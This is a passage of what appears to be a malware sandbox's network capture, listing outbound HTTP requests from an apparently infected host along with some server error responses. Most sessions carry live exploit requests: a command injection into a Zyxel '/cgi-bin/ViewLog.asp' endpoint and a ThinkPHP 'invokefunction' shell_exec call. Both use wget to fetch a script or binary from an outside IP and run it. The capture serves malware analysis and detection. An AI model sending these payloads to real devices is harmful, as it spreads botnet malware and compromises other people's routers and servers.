                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            610192.168.2.235163031.136.139.878080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.661798000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:23.895669937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:30.038846970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.069127083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:07.153598070 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:56.298842907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            611192.168.2.234359294.122.27.28080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.687855959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            612192.168.2.234768294.123.154.1608080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.689491987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            613192.168.2.234959094.121.134.1268080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.689654112 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            614192.168.2.235499294.131.60.1688080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.807315111 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:20.926503897 CET1260INHTTP/1.1 400 Bad Request
                                                            Server: squid/6.0.0-20220501-re899e0c27
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:29:20 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3572
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Vary: Accept-Language
                                                            Content-Language: en
                                                            Cache-Status: ezproxies.com
                                                            Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            615192.168.2.2344570112.80.252.25380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.925725937 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:21.274930000 CET311INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            616192.168.2.2354508112.47.11.4180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:20.940885067 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            617192.168.2.233299631.132.79.1158080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.014585972 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            618192.168.2.234081431.129.95.278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.052050114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:21.292666912 CET376INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 11:54:05 GMT
                                                            Server: DNVRS-Webs
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            619192.168.2.233875494.121.137.1958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.055315018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            620192.168.2.235893294.123.69.58080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.055427074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            621192.168.2.233564662.29.47.2018080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.073527098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            622192.168.2.233999494.122.19.2088080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.075582981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            623192.168.2.234817631.200.41.868080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.075727940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            624192.168.2.235512494.122.18.2178080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.076311111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            625192.168.2.234689885.208.122.1008080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.077299118 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:21.327699900 CET1286INHTTP/1.0 400 Bad Request
                                                            Server: squid/3.1.23
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 07:59:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3167
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
